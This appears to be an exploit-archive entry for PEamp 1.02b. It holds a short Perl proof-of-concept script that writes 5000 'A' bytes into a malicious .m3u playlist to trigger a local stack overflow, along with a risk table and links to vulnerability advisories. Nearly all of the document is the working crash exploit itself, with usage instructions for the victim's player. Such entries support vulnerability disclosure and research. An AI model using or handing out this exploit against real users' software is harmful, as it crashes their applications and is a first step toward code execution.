

| Risk |
Local |
| Remote |
| High |
Yes |
| No |
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
# # PEamp 1.02b (.M3U File) Local Stack Overflow POC ##
# # Download: http://files.brothersoft.com/mp3_audio/players/mp3player.zip ##
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
my $chars= "A" x 5000;
my $file="dz.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
# usage: amp.exe=> load playlist => dz.m3u => Boom !!! :)
References:
http://xforce.iss.net/xforce/xfdb/51479
http://www.milw0rm.com/exploits/9061
http://secunia.com/advisories/35663
[ ASCII VERSION ]
|